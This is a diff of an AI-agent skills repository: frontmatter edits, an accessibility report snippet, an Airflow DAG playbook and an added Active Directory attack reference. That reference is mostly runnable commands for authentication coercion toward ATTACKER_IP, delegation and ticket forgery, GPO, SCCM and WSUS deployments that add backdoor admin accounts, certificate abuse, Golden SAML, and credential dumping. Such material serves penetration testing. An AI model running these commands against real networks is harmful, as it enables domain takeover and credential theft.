  <div class="violation ${v.impact}">
    <h3>${v.help}</h3>
    <p><strong>Impact:</strong> ${v.impact}</p>
    <p>${v.description}</p>
    <a href="${v.helpUrl}">Learn more</a>
  </div>
`,
    )
    .join("")}
</body>
</html>`;
  }
}
```
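The `score` field the report consumes has to be computed somewhere. A minimal sketch, assuming simple per-impact penalty weights; both the weights and the `computeScore` helper are illustrative, not part of axe-core:

```javascript
// Hypothetical scoring helper; the impact weights are assumptions, not a standard.
const IMPACT_WEIGHTS = { critical: 10, serious: 5, moderate: 2, minor: 1 };

function computeScore(violations) {
  // Subtract a weighted penalty per violation, flooring the score at 0.
  const penalty = violations.reduce(
    (sum, v) => sum + (IMPACT_WEIGHTS[v.impact] || 1),
    0,
  );
  return Math.max(0, 100 - penalty);
}
```

Tune the weights to your own severity policy; the point is that the score is deterministic from the violation list.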
## Output Format

1. **Accessibility Score**: Overall compliance with WCAG levels
2. **Violation Report**: Detailed issues with severity and fixes
3. **Test Results**: Automated and manual test outcomes
4. **Remediation Guide**: Step-by-step fixes for each issue
5. **Code Examples**: Accessible component implementations

Focus on creating inclusive experiences that work for all users, regardless of their abilities or assistive technologies.
@@ -1,11 +1,9 @@
---
name: active-directory-attacks
description: "This skill should be used when the user asks to \"attack Active Directory\", \"exploit AD\", \"Kerberoasting\", \"DCSync\", \"pass-the-hash\", \"BloodHound enumeration\", \"Golden Ticket\", ..."
metadata:
  author: zebbern
  version: "1.1"
risk: unknown
source: community
date_added: "2026-02-27"
---

# Active Directory Attacks
@@ -0,0 +1,382 @@
# Advanced Active Directory Attacks Reference

## Table of Contents
1. [Delegation Attacks](#delegation-attacks)
2. [Group Policy Object Abuse](#group-policy-object-abuse)
3. [RODC Attacks](#rodc-attacks)
4. [SCCM/WSUS Deployment](#sccmwsus-deployment)
5. [AD Certificate Services (ADCS)](#ad-certificate-services-adcs)
6. [Trust Relationship Attacks](#trust-relationship-attacks)
7. [ADFS Golden SAML](#adfs-golden-saml)
8. [Credential Sources](#credential-sources)
9. [Linux AD Integration](#linux-ad-integration)

---

## Delegation Attacks

### Unconstrained Delegation

When a user authenticates to a computer with unconstrained delegation, their TGT is saved to memory.

**Find Delegation:**
```powershell
# PowerShell
Get-ADComputer -Filter {TrustedForDelegation -eq $True}

# BloodHound
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
```

**SpoolService Abuse:**
```bash
# Check spooler service
ls \\dc01\pipe\spoolss

# Trigger with SpoolSample
.\SpoolSample.exe DC01.domain.local HELPDESK.domain.local

# Or with printerbug.py
python3 printerbug.py 'domain/user:pass'@DC01 ATTACKER_IP
```

**Monitor with Rubeus:**
```powershell
Rubeus.exe monitor /interval:1
```

### Constrained Delegation

**Identify:**
```powershell
Get-DomainComputer -TrustedToAuth | select -exp msds-AllowedToDelegateTo
```

**Exploit with Rubeus:**
```powershell
# S4U2 attack
Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
```

**Exploit with Impacket:**
```bash
getST.py -spn HOST/target.domain.local 'domain/user:password' -impersonate Administrator -dc-ip DC_IP
```

### Resource-Based Constrained Delegation (RBCD)

```powershell
# Create machine account
New-MachineAccount -MachineAccount AttackerPC -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)

# Set delegation
Set-ADComputer target -PrincipalsAllowedToDelegateToAccount AttackerPC$

# Get ticket
.\Rubeus.exe s4u /user:AttackerPC$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
```

---

## Group Policy Object Abuse

### Find Vulnerable GPOs

```powershell
Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|WriteDacl|WriteOwner")}
```

### Abuse with SharpGPOAbuse

```powershell
# Add local admin
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO"

# Add user rights
.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "Vulnerable GPO"

# Add immediate task
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add" --GPOName "Vulnerable GPO"
```

### Abuse with pyGPOAbuse (Linux)

```bash
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
```

---

## RODC Attacks

### RODC Golden Ticket

RODCs hold a filtered copy of the AD database (LAPS and BitLocker keys are excluded). Tickets forged with the RODC krbtgt are only honored for principals in msDS-RevealOnDemandGroup.

### RODC Key List Attack

**Requirements:**
- krbtgt credentials of the RODC (-rodcKey)
- ID of the krbtgt account of the RODC (-rodcNo)

```bash
# Impacket keylistattack
keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full

# Using secretsdump with keylist
secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
```

**Using Rubeus:**
```powershell
Rubeus.exe golden /rodcNumber:25078 /aes256:RODC_AES256_KEY /user:Administrator /id:500 /domain:domain.local /sid:S-1-5-21-xxx
```

---

## SCCM/WSUS Deployment

### SCCM Attack with MalSCCM

```bash
# Locate SCCM server
MalSCCM.exe locate

# Enumerate targets
MalSCCM.exe inspect /all
MalSCCM.exe inspect /computers

# Create target group
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET-PC

# Create malicious app
MalSCCM.exe app /create /name:backdoor /uncpath:"\\SCCM\SCCMContentLib$\evil.exe"

# Deploy
MalSCCM.exe app /deploy /name:backdoor /groupname:TargetGroup /assignmentname:update

# Force checkin
MalSCCM.exe checkin /groupname:TargetGroup

# Cleanup
MalSCCM.exe app /cleanup /name:backdoor
MalSCCM.exe group /delete /groupname:TargetGroup
```

### SCCM Network Access Accounts

```powershell
# Find SCCM blob
Get-WmiObject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"

# Decrypt with SharpSCCM
.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
```

### WSUS Deployment Attack

```bash
# Using SharpWSUS
SharpWSUS.exe locate
SharpWSUS.exe inspect

# Create malicious update
SharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user backdoor Password123! /add\"" /title:"Critical Update"

# Deploy to target
SharpWSUS.exe approve /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"

# Check status
SharpWSUS.exe check /updateid:GUID /computername:TARGET.domain.local

# Cleanup
SharpWSUS.exe delete /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
```

---

## AD Certificate Services (ADCS)

### ESC1 - Misconfigured Templates

The template allows ENROLLEE_SUPPLIES_SUBJECT and includes a Client Authentication EKU.

```bash
# Find vulnerable templates
certipy find -u user@domain.local -p password -dc-ip DC_IP -vulnerable

# Request certificate as admin
certipy req -u user@domain.local -p password -ca CA-NAME -target ca.domain.local -template VulnTemplate -upn administrator@domain.local

# Authenticate
certipy auth -pfx administrator.pfx -dc-ip DC_IP
```

### ESC4 - ACL Vulnerabilities

```bash
# Check for WriteProperty
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -get-acl

# Add ENROLLEE_SUPPLIES_SUBJECT flag
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT

# Perform ESC1, then restore
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -value 0 -property mspki-Certificate-Name-Flag
```

### ESC8 - NTLM Relay to Web Enrollment

```bash
# Start relay
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Coerce authentication
python3 petitpotam.py ATTACKER_IP DC_IP

# Use certificate
Rubeus.exe asktgt /user:DC$ /certificate:BASE64_CERT /ptt
```

### Shadow Credentials

```bash
# Add Key Credential (pyWhisker)
python3 pywhisker.py -d "domain.local" -u "user1" -p "password" --target "TARGET" --action add

# Get TGT with PKINIT
python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "password" "domain.local/TARGET" target.ccache

# Get NT hash
export KRB5CCNAME=target.ccache
python3 getnthash.py -key 'AS-REP_KEY' domain.local/TARGET
```

---

## Trust Relationship Attacks

### Child to Parent Domain (SID History)

```powershell
# Get Enterprise Admins SID from parent
$ParentSID = "S-1-5-21-PARENT-DOMAIN-SID-519"

# Create Golden Ticket with SID History
kerberos::golden /user:Administrator /domain:child.parent.local /sid:S-1-5-21-CHILD-SID /krbtgt:KRBTGT_HASH /sids:$ParentSID /ptt
```

### Forest to Forest (Trust Ticket)

```bash
# Dump trust key
lsadump::trust /patch

# Forge inter-realm TGT
kerberos::golden /domain:domain.local /sid:S-1-5-21-xxx /rc4:TRUST_KEY /user:Administrator /service:krbtgt /target:external.com /ticket:trust.kirbi

# Use trust ticket
.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/target.external.com /dc:dc.external.com /ptt
```

---

## ADFS Golden SAML

**Requirements:**
- ADFS service account access
- Token signing certificate (PFX + decryption password)

```bash
# Dump with ADFSDump
.\ADFSDump.exe

# Forge SAML token
python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.domain.local saml2 --endpoint https://target/saml --nameid administrator@domain.local
```

---

## Credential Sources

### LAPS Password

```powershell
# PowerShell
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

# CrackMapExec
crackmapexec ldap DC_IP -u user -p password -M laps
```

### GMSA Password

```powershell
# PowerShell + DSInternals
$gmsa = Get-ADServiceAccount -Identity 'SVC_ACCOUNT' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp
```

```bash
# Linux with bloodyAD
python bloodyAD.py -u user -p password --host DC_IP getObjectAttributes gmsaAccount$ msDS-ManagedPassword
```

### Group Policy Preferences (GPP)

```bash
# Find in SYSVOL
findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml

# Decrypt
python3 Get-GPPPassword.py -no-pass 'DC_IP'
```

### DSRM Credentials

```powershell
# Dump DSRM hash
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

# Enable DSRM admin logon
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
```

---

## Linux AD Integration

### CCACHE Ticket Reuse

```bash
# Find tickets
ls /tmp/ | grep krb5cc

# Use ticket
export KRB5CCNAME=/tmp/krb5cc_1000
```

### Extract from Keytab

```bash
# List keys
klist -k /etc/krb5.keytab

# Extract with KeyTabExtract
python3 keytabextract.py /etc/krb5.keytab
```

### Extract from SSSD

```bash
# Database location
/var/lib/sss/secrets/secrets.ldb

# Key location
/var/lib/sss/secrets/.secrets.mkey

# Extract
python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
```
@@ -1,10 +1,9 @@
---
name: activecampaign-automation
description: "Automate ActiveCampaign tasks via Rube MCP (Composio): manage contacts, tags, list subscriptions, automation enrollment, and tasks. Always search tools first for current schemas."
requires:
  mcp: [rube]
risk: unknown
source: community
date_added: "2026-02-27"
---

# ActiveCampaign Automation via Rube MCP

@@ -3,6 +3,7 @@ name: address-github-comments
description: "Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Address GitHub Comments

@@ -1,8 +1,9 @@
---
name: agent-evaluation
description: "Testing and benchmarking LLM agents including behavioral testing, capability assessment, reliability metrics, and production monitoring\u2014where even top agents achieve less than 50% on re..."
source: vibeship-spawner-skills (Apache 2.0)
risk: unknown
source: "vibeship-spawner-skills (Apache 2.0)"
date_added: "2026-02-27"
---

# Agent Evaluation

@@ -1,9 +1,9 @@
---
name: agent-framework-azure-ai-py
description: "Build Azure AI Foundry agents using the Microsoft Agent Framework Python SDK (agent-framework-azure-ai). Use when creating persistent agents with AzureAIAgentsProvider, using hosted tools (code int..."
package: agent-framework-azure-ai
risk: unknown
source: community
date_added: "2026-02-27"
---

# Agent Framework Azure Hosted Agents

@@ -3,6 +3,7 @@ name: agent-manager-skill
description: "Manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Agent Manager Skill

@@ -1,9 +1,9 @@
---
name: agent-memory-mcp
author: Amit Rathiesh
description: "A hybrid memory system that provides persistent, searchable knowledge management for AI agents (Architecture, Patterns, Decisions)."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Agent Memory Skill

@@ -1,8 +1,9 @@
---
name: agent-memory-systems
description: "Memory is the cornerstone of intelligent agents. Without it, every interaction starts from zero. This skill covers the architecture of agent memory: short-term (context window), long-term (vector s..."
source: vibeship-spawner-skills (Apache 2.0)
risk: unknown
source: "vibeship-spawner-skills (Apache 2.0)"
date_added: "2026-02-27"
---

# Agent Memory Systems

@@ -3,6 +3,7 @@ name: agent-orchestration-improve-agent
description: "Systematic improvement of existing agents through performance analysis, prompt engineering, and continuous iteration."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Agent Performance Optimization Workflow

@@ -3,6 +3,7 @@ name: agent-orchestration-multi-agent-optimize
description: "Optimize multi-agent systems with coordinated profiling, workload distribution, and cost-aware orchestration. Use when improving agent performance, throughput, or reliability."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Multi-Agent Optimization Toolkit

@@ -1,8 +1,9 @@
---
name: agent-tool-builder
description: "Tools are how AI agents interact with the world. A well-designed tool is the difference between an agent that works and one that hallucinates, fails silently, or costs 10x more tokens than necessar..."
source: vibeship-spawner-skills (Apache 2.0)
risk: unknown
source: "vibeship-spawner-skills (Apache 2.0)"
date_added: "2026-02-27"
---

# Agent Tool Builder

@@ -1,8 +1,9 @@
---
name: agentfolio
description: "Skill for discovering and researching autonomous AI agents, tools, and ecosystems using the AgentFolio directory."
source: agentfolio.io
risk: unknown
source: agentfolio.io
date_added: "2026-02-27"
---

# AgentFolio

@@ -1,9 +1,9 @@
---
name: agents-v2-py
description: "Build container-based Foundry Agents with Azure AI Projects SDK (ImageBasedHostedAgentDefinition). Use when creating hosted agents with custom container images in Azure AI Foundry."
package: azure-ai-projects
risk: unknown
source: community
date_added: "2026-02-27"
---

# Azure AI Hosted Agents (Python)

@@ -1,11 +1,10 @@
---
name: ai-agent-development
description: "AI agent development workflow for building autonomous agents, multi-agent systems, and agent orchestration with CrewAI, LangGraph, and custom agents."
source: personal
risk: safe
domain: ai-ml
category: granular-workflow-bundle
version: 1.0.0
risk: safe
source: personal
date_added: "2026-02-27"
---

# AI Agent Development Workflow

@@ -1,8 +1,9 @@
---
name: ai-agents-architect
description: "Expert in designing and building autonomous AI agents. Masters tool use, memory systems, planning strategies, and multi-agent orchestration. Use when: build agent, AI agent, autonomous agent, tool ..."
source: vibeship-spawner-skills (Apache 2.0)
risk: unknown
source: "vibeship-spawner-skills (Apache 2.0)"
date_added: "2026-02-27"
---

# AI Agents Architect

@@ -1,14 +1,9 @@
---
name: ai-engineer
description: |
  Build production-ready LLM applications, advanced RAG systems, and
  intelligent agents. Implements vector search, multimodal AI, agent
  orchestration, and enterprise AI integrations. Use PROACTIVELY for LLM
  features, chatbots, AI agents, or AI-powered applications.
metadata:
  model: inherit
description: Build production-ready LLM applications, advanced RAG systems, and intelligent agents. Implements vector search, multimodal AI, agent orchestration, and enterprise AI integrations.
risk: unknown
source: community
date_added: '2026-02-27'
---

You are an AI engineer specializing in production-grade LLM applications, generative AI systems, and intelligent agent architectures.

@@ -1,11 +1,10 @@
---
name: ai-ml
description: "AI and machine learning workflow covering LLM application development, RAG implementation, agent architecture, ML pipelines, and AI-powered features."
source: personal
risk: safe
domain: artificial-intelligence
category: workflow-bundle
version: 1.0.0
risk: safe
source: personal
date_added: "2026-02-27"
---

# AI/ML Workflow Bundle

@@ -1,8 +1,9 @@
---
name: ai-product
description: "Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt ..."
source: vibeship-spawner-skills (Apache 2.0)
description: Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt ...
risk: unknown
source: vibeship-spawner-skills (Apache 2.0)
date_added: '2026-02-27'
---

# AI Product Development

@@ -1,8 +1,9 @@
---
name: ai-wrapper-product
description: "Expert in building products that wrap AI APIs (OpenAI, Anthropic, etc.) into focused tools people will pay for. Not just 'ChatGPT but different' - products that solve specific problems with AI. Cov..."
source: vibeship-spawner-skills (Apache 2.0)
risk: unknown
source: "vibeship-spawner-skills (Apache 2.0)"
date_added: "2026-02-27"
---

# AI Wrapper Product

@@ -3,6 +3,7 @@ name: airflow-dag-patterns
description: "Build production Apache Airflow DAGs with best practices for operators, sensors, testing, and deployment. Use when creating data pipelines, orchestrating workflows, or scheduling batch jobs."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Apache Airflow DAG Patterns

@@ -0,0 +1,509 @@
# Apache Airflow DAG Patterns Implementation Playbook

This file contains detailed patterns, checklists, and code samples referenced by the skill.

## Core Concepts

### 1. DAG Design Principles

| Principle | Description |
|-----------|-------------|
| **Idempotent** | Running twice produces the same result |
| **Atomic** | Tasks succeed or fail completely |
| **Incremental** | Process only new/changed data |
| **Observable** | Logs, metrics, alerts at every step |
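The **Idempotent** and **Incremental** principles above combine naturally: derive the data slice from the run's data interval, so a rerun always touches exactly the same rows. A minimal sketch; the table and `loaded_at` column are illustrative, and in a real task Airflow would supply the bounds from the template context (`data_interval_start` / `data_interval_end`):

```python
from datetime import datetime

def build_incremental_query(table: str, start: datetime, end: datetime) -> str:
    # Half-open interval [start, end) keeps reruns idempotent: the same
    # logical run always selects exactly the same rows, with no overlap
    # between adjacent runs.
    return (
        f"SELECT * FROM {table} "
        f"WHERE loaded_at >= '{start.isoformat()}' "
        f"AND loaded_at < '{end.isoformat()}'"
    )

# In an Airflow task these bounds come from the run's data interval.
query = build_incremental_query("events", datetime(2024, 1, 1), datetime(2024, 1, 2))
```

Filtering on the interval rather than on "now" is what makes backfills and retries safe.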
### 2. Task Dependencies

```python
# Linear
task1 >> task2 >> task3

# Fan-out
task1 >> [task2, task3, task4]

# Fan-in
[task1, task2, task3] >> task4

# Complex
task1 >> task2 >> task4
task1 >> task3 >> task4
```

## Quick Start

```python
# dags/example_dag.py
from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.python import PythonOperator
from airflow.operators.empty import EmptyOperator

default_args = {
    'owner': 'data-team',
    'depends_on_past': False,
    'email_on_failure': True,
    'email_on_retry': False,
    'retries': 3,
    'retry_delay': timedelta(minutes=5),
    'retry_exponential_backoff': True,
    'max_retry_delay': timedelta(hours=1),
}

with DAG(
    dag_id='example_etl',
    default_args=default_args,
    description='Example ETL pipeline',
    schedule='0 6 * * *',  # Daily at 6 AM
    start_date=datetime(2024, 1, 1),
    catchup=False,
    tags=['etl', 'example'],
    max_active_runs=1,
) as dag:

    start = EmptyOperator(task_id='start')

    def extract_data(**context):
        execution_date = context['ds']
        # Extract logic here
        return {'records': 1000}

    extract = PythonOperator(
        task_id='extract',
        python_callable=extract_data,
    )

    end = EmptyOperator(task_id='end')

    start >> extract >> end
```

## Patterns

### Pattern 1: TaskFlow API (Airflow 2.0+)

```python
# dags/taskflow_example.py
from datetime import datetime
from airflow.decorators import dag, task
from airflow.models import Variable

@dag(
    dag_id='taskflow_etl',
    schedule='@daily',
    start_date=datetime(2024, 1, 1),
    catchup=False,
    tags=['etl', 'taskflow'],
)
def taskflow_etl():
    """ETL pipeline using TaskFlow API"""

    @task()
    def extract(source: str, ds: str = None) -> dict:
        """Extract data from source (Airflow injects the ds context variable)"""
        import pandas as pd

        df = pd.read_csv(f's3://bucket/{source}/{ds}.csv')
        return {'data': df.to_dict(), 'rows': len(df)}

    @task()
    def transform(extracted: dict) -> dict:
        """Transform extracted data"""
        import pandas as pd

        df = pd.DataFrame(extracted['data'])
        df['processed_at'] = datetime.now()
        df = df.dropna()
        return {'data': df.to_dict(), 'rows': len(df)}

    @task()
    def load(transformed: dict, target: str, ds: str = None):
        """Load data to target"""
        import pandas as pd

        df = pd.DataFrame(transformed['data'])
        df.to_parquet(f's3://bucket/{target}/{ds}.parquet')
        return transformed['rows']

    @task()
    def notify(rows_loaded: int):
        """Send notification"""
        print(f'Loaded {rows_loaded} rows')

    # Define dependencies with XCom passing
    extracted = extract(source='raw_data')
    transformed = transform(extracted)
    loaded = load(transformed, target='processed_data')
    notify(loaded)

# Instantiate the DAG
taskflow_etl()
```

### Pattern 2: Dynamic DAG Generation

```python
# dags/dynamic_dag_factory.py
from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.python import PythonOperator
from airflow.models import Variable
import json

# Configuration for multiple similar pipelines
PIPELINE_CONFIGS = [
    {'name': 'customers', 'schedule': '@daily', 'source': 's3://raw/customers'},
    {'name': 'orders', 'schedule': '@hourly', 'source': 's3://raw/orders'},
    {'name': 'products', 'schedule': '@weekly', 'source': 's3://raw/products'},
]

def create_dag(config: dict) -> DAG:
    """Factory function to create DAGs from config"""

    dag_id = f"etl_{config['name']}"

    default_args = {
        'owner': 'data-team',
        'retries': 3,
        'retry_delay': timedelta(minutes=5),
    }

    dag = DAG(
        dag_id=dag_id,
        default_args=default_args,
        schedule=config['schedule'],
        start_date=datetime(2024, 1, 1),
        catchup=False,
        tags=['etl', 'dynamic', config['name']],
    )

    with dag:
        def extract_fn(source, **context):
            print(f"Extracting from {source} for {context['ds']}")

        def transform_fn(**context):
            print(f"Transforming data for {context['ds']}")

        def load_fn(table_name, **context):
            print(f"Loading to {table_name} for {context['ds']}")

        extract = PythonOperator(
            task_id='extract',
            python_callable=extract_fn,
            op_kwargs={'source': config['source']},
        )

        transform = PythonOperator(
            task_id='transform',
            python_callable=transform_fn,
        )

        load = PythonOperator(
            task_id='load',
            python_callable=load_fn,
            op_kwargs={'table_name': config['name']},
        )

        extract >> transform >> load

    return dag

# Generate DAGs
for config in PIPELINE_CONFIGS:
    globals()[f"dag_{config['name']}"] = create_dag(config)
```

### Pattern 3: Branching and Conditional Logic

```python
# dags/branching_example.py
from datetime import datetime

from airflow.decorators import dag, task
from airflow.operators.python import BranchPythonOperator
from airflow.operators.empty import EmptyOperator
from airflow.utils.trigger_rule import TriggerRule


@dag(
    dag_id='branching_pipeline',
    schedule='@daily',
    start_date=datetime(2024, 1, 1),
    catchup=False,
)
def branching_pipeline():

    @task()
    def check_data_quality() -> dict:
        """Check data quality and return metrics."""
        quality_score = 0.95  # Simulated
        return {'score': quality_score, 'rows': 10000}

    def choose_branch(**context) -> str:
        """Determine which branch to execute."""
        ti = context['ti']
        metrics = ti.xcom_pull(task_ids='check_data_quality')

        if metrics['score'] >= 0.9:
            return 'high_quality_path'
        elif metrics['score'] >= 0.7:
            return 'medium_quality_path'
        else:
            return 'low_quality_path'

    quality_check = check_data_quality()

    branch = BranchPythonOperator(
        task_id='branch',
        python_callable=choose_branch,
    )

    high_quality = EmptyOperator(task_id='high_quality_path')
    medium_quality = EmptyOperator(task_id='medium_quality_path')
    low_quality = EmptyOperator(task_id='low_quality_path')

    # Join point - runs after any branch completes
    join = EmptyOperator(
        task_id='join',
        trigger_rule=TriggerRule.NONE_FAILED_MIN_ONE_SUCCESS,
    )

    quality_check >> branch >> [high_quality, medium_quality, low_quality] >> join


branching_pipeline()
```

### Pattern 4: Sensors and External Dependencies

```python
# dags/sensor_patterns.py
from datetime import datetime, timedelta

from airflow import DAG
from airflow.decorators import task
from airflow.operators.python import PythonOperator
from airflow.providers.amazon.aws.sensors.s3 import S3KeySensor
from airflow.sensors.base import PokeReturnValue
from airflow.sensors.external_task import ExternalTaskSensor

with DAG(
    dag_id='sensor_example',
    schedule='@daily',
    start_date=datetime(2024, 1, 1),
    catchup=False,
) as dag:

    # Wait for file on S3
    wait_for_file = S3KeySensor(
        task_id='wait_for_s3_file',
        bucket_name='data-lake',
        bucket_key='raw/{{ ds }}/data.parquet',
        aws_conn_id='aws_default',
        timeout=60 * 60 * 2,   # 2 hours
        poke_interval=60 * 5,  # Check every 5 minutes
        mode='reschedule',     # Free up worker slot while waiting
    )

    # Wait for another DAG to complete
    wait_for_upstream = ExternalTaskSensor(
        task_id='wait_for_upstream_dag',
        external_dag_id='upstream_etl',
        external_task_id='final_task',
        execution_date_fn=lambda dt: dt,  # Same execution date
        timeout=60 * 60 * 3,
        mode='reschedule',
    )

    # Custom sensor using @task.sensor decorator
    @task.sensor(poke_interval=60, timeout=3600, mode='reschedule')
    def wait_for_api() -> PokeReturnValue:
        """Custom sensor for API availability."""
        import requests

        response = requests.get('https://api.example.com/health')
        is_done = response.status_code == 200

        return PokeReturnValue(is_done=is_done, xcom_value=response.json())

    api_ready = wait_for_api()

    def process_data(**context):
        api_result = context['ti'].xcom_pull(task_ids='wait_for_api')
        print(f"API returned: {api_result}")

    process = PythonOperator(
        task_id='process',
        python_callable=process_data,
    )

    [wait_for_file, wait_for_upstream, api_ready] >> process
```

### Pattern 5: Error Handling and Alerts

```python
# dags/error_handling.py
from datetime import datetime, timedelta

from airflow import DAG
from airflow.operators.python import PythonOperator
from airflow.utils.trigger_rule import TriggerRule


def task_failure_callback(context):
    """Callback on task failure."""
    task_instance = context['task_instance']
    exception = context.get('exception')

    # Send to Slack/PagerDuty/etc.
    message = f"""
    Task Failed!
    DAG: {task_instance.dag_id}
    Task: {task_instance.task_id}
    Execution Date: {context['ds']}
    Error: {exception}
    Log URL: {task_instance.log_url}
    """
    # send_slack_alert(message)
    print(message)


def dag_failure_callback(context):
    """Callback on DAG failure."""
    # Aggregate failures, send summary
    pass


with DAG(
    dag_id='error_handling_example',
    schedule='@daily',
    start_date=datetime(2024, 1, 1),
    catchup=False,
    on_failure_callback=dag_failure_callback,
    default_args={
        'on_failure_callback': task_failure_callback,
        'retries': 3,
        'retry_delay': timedelta(minutes=5),
    },
) as dag:

    def might_fail(**context):
        import random
        if random.random() < 0.3:
            raise ValueError("Random failure!")
        return "Success"

    risky_task = PythonOperator(
        task_id='risky_task',
        python_callable=might_fail,
    )

    def cleanup(**context):
        """Cleanup runs regardless of upstream failures."""
        print("Cleaning up...")

    cleanup_task = PythonOperator(
        task_id='cleanup',
        python_callable=cleanup,
        trigger_rule=TriggerRule.ALL_DONE,  # Run even if upstream fails
    )

    def notify_success(**context):
        """Only runs if all upstream succeeded."""
        print("All tasks succeeded!")

    success_notification = PythonOperator(
        task_id='notify_success',
        python_callable=notify_success,
        trigger_rule=TriggerRule.ALL_SUCCESS,
    )

    risky_task >> [cleanup_task, success_notification]
```

### Pattern 6: Testing DAGs

```python
# tests/test_dags.py
import pytest
from airflow.models import DagBag
from airflow.utils.dag_cycle_tester import check_cycle


@pytest.fixture
def dagbag():
    return DagBag(dag_folder='dags/', include_examples=False)


def test_dag_loaded(dagbag):
    """Test that all DAGs load without errors."""
    assert len(dagbag.import_errors) == 0, f"DAG import errors: {dagbag.import_errors}"


def test_dag_structure(dagbag):
    """Test specific DAG structure."""
    dag = dagbag.get_dag('example_etl')

    assert dag is not None
    assert len(dag.tasks) == 3
    assert dag.schedule_interval == '0 6 * * *'


def test_task_dependencies(dagbag):
    """Test task dependencies are correct."""
    dag = dagbag.get_dag('example_etl')

    extract_task = dag.get_task('extract')
    assert 'start' in [t.task_id for t in extract_task.upstream_list]
    assert 'end' in [t.task_id for t in extract_task.downstream_list]


def test_dag_integrity(dagbag):
    """Test DAGs have no cycles."""
    for dag_id, dag in dagbag.dags.items():
        check_cycle(dag)  # Raises if a cycle is detected


# Test individual task logic
def test_extract_function():
    """Unit test for extract function."""
    from dags.example_dag import extract_data

    result = extract_data(ds='2024-01-01')
    assert 'records' in result
    assert isinstance(result['records'], int)
```

## Project Structure

```
airflow/
├── dags/
│   ├── __init__.py
│   ├── common/
│   │   ├── __init__.py
│   │   ├── operators.py      # Custom operators
│   │   ├── sensors.py        # Custom sensors
│   │   └── callbacks.py      # Alert callbacks
│   ├── etl/
│   │   ├── customers.py
│   │   └── orders.py
│   └── ml/
│       └── training.py
├── plugins/
│   └── custom_plugin.py
├── tests/
│   ├── __init__.py
│   ├── test_dags.py
│   └── test_operators.py
├── docker-compose.yml
└── requirements.txt
```

## Best Practices

### Do's
- **Use the TaskFlow API** - Cleaner code, automatic XCom handling
- **Set timeouts** - Prevent zombie tasks
- **Use `mode='reschedule'` for sensors** - Frees up worker slots while waiting
- **Test DAGs** - Unit tests and integration tests
- **Keep tasks idempotent** - Safe to retry
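
The idempotency rule above can be sketched outside Airflow: a load that deletes its run-date partition before inserting, so retrying the same logical date (`ds`) yields the same final state. The table and column names here are illustrative, not from any skill in this PR.

```python
import sqlite3

def idempotent_load(conn, ds, rows):
    """Load rows for one logical date; safe to retry."""
    with conn:  # single transaction: delete + insert commit together
        conn.execute("DELETE FROM events WHERE ds = ?", (ds,))
        conn.executemany(
            "INSERT INTO events (ds, value) VALUES (?, ?)",
            [(ds, v) for v in rows],
        )

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE events (ds TEXT, value INTEGER)")

idempotent_load(conn, "2024-01-01", [1, 2, 3])
idempotent_load(conn, "2024-01-01", [1, 2, 3])  # retry: no duplicates

count = conn.execute("SELECT COUNT(*) FROM events").fetchone()[0]
print(count)  # 3
```

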